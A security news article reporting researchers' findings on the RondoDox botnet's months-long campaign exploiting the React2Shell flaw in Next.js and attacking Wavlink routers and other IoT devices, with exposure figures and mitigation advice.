Wavlink routers and other IoT devices hit by React2Shell attacks
Security researchers say a botnet called RondoDox has spent nine straight months targeting Internet of Things (IoT) devices and web servers, hitting popular platforms like WordPress, Drupal, and Struts2, alongside consumer-grade IoT devices such as Wavlink routers.
-
The RondoDox botnet exploited React2Shell to compromise Wavlink routers, IP cameras, and Next.js servers.
-
The botnet eliminates competing malware and installs cryptocurrency miners.
-
Attackers targeted WordPress, Drupal, Struts2, and consumer IoT devices, with 150,000 daily React2Shell exploit attempts.
-
Nearly 90,000 systems remain vulnerable to React2Shell.
A recent analysis by CloudSEK reveals that the campaign has escalated by exploiting React2Shell (CVE-2025-55182), a critical vulnerability in React Server Components and Next.js that enables unauthenticated attackers to execute code remotely.
RondoDox has previously abused older vulnerabilities, like CVE-2023-1389 and CVE-2025-24893, but later started exploiting the React2Shell vulnerability.
RondoDox first appeared in early 2025, but CloudSEK’s analysis suggests that the threat actors behind it didn’t rush to execute the attack. Instead, the campaign unfolded in carefully staged phases.
According to researchers, from March through April, attackers conducted reconnaissance and manual vulnerability scanning. By late spring, they shifted to daily mass probing, hitting popular platforms like WordPress, Drupal, and Struts2, alongside consumer-grade IoT devices such as Wavlink routers.
By July, the operation had fully industrialized. Automated deployment kicked in on an hourly basis, dramatically expanding the botnet’s reach.
The December attacks marked the most aggressive phase yet, with attackers actively scanning for exposed Next.js servers and dropping multiple payloads in rapid succession.
In attacks observed in December 2025, the threat actors reportedly scanned the internet for vulnerable Next.js servers before attempting to deploy a mix of cryptocurrency miners, botnet tooling, and a Mirai-based payload.
Killing the competition
One of RondoDox’s more notable traits is how aggressively it defends its turf. CloudSEK found that a component known as “/nuts/bolts” is designed to wipe out rival malware before installing the main bot.
It terminates competing coin miners, removes artifacts from previous attacks, and scrubs Docker-based payloads left behind by other threat actors.
The tool goes further by setting up persistence via /etc/crontab and continuously scanning running processes.
Every 45 seconds, it checks active executables and kills anything not on its whitelist, effectively preventing reinfection by competitors and turning compromised devices into single-tenant assets for the RondoDox operators.
Many internet-facing devices are at risk
According to the researchers, the impact of the campaign is severe. Organizations with internet-facing routers, IP cameras, and other network appliances are at risk as they are constantly targeted by automated and persistent attacks.
These devices could be potentially absorbed into botnets or misused for denial-of-service attacks and cryptocurrency mining.
At the application layer, enterprises running vulnerable Next.js Server Actions face the possibility of full server compromise through actively exploited deserialization flaws.
Researchers note that attackers often chain these weaknesses together, using compromised web applications such as WordPress, Drupal, Struts2, or WebLogic as an initial entry point before harvesting credentials and moving laterally into IoT and network infrastructure.
The risk is amplified by the botnet’s ability to deploy across multiple hardware architectures, allowing it to operate in cloud environments, edge devices, and embedded systems alike.
To reduce exposure, organizations should promptly upgrade to patched versions of Next.js, isolate IoT devices within dedicated VLANs, deploy web application firewalls, closely monitor systems for unusual process activity, and block known command-and-control infrastructure.
Attackers actively exploit React2Shell
A React2Shell cloud-side vulnerability has been actively exploited by threat actors since its disclosure. The vulnerability scores a maximum CVSS score of 10.0, and enables external attackers to run privileged, arbitrary code on servers without authorization.
While the React team urged updates, researchers identified 150,000 exploit attempts a day, many involving direct command injection.
Smart home telemetry gathered over the past month by Bitdefender researchers shows just how aggressively the vulnerability is being exploited in the wild.
Attackers mainly targeted smart home appliances and consumer electronics. A significant amount of React2Shell traffic originated from a single datacenter in Poland, with one IP address alone responsible for over 12,000 exploit events.
Additional probing originated from the US, the Netherlands, Ireland, France, Hong Kong, Singapore, China, Panama, and numerous other regions.
AWS security teams report that they have observed active exploitation attempts by multiple China state-nexus threat groups, including Earth Lamia and Jackpot Panda, just within hours of disclosure.
As of December 31st, the Shadowserver Foundation, a non-profit organization that monitors exposed systems and vulnerabilities, has detected around 88,700 systems that are still vulnerable to React2Shell, with most of the systems vulnerable to React2Shell being in the US.
Unlock more exclusive Cybernews content on YouTube.
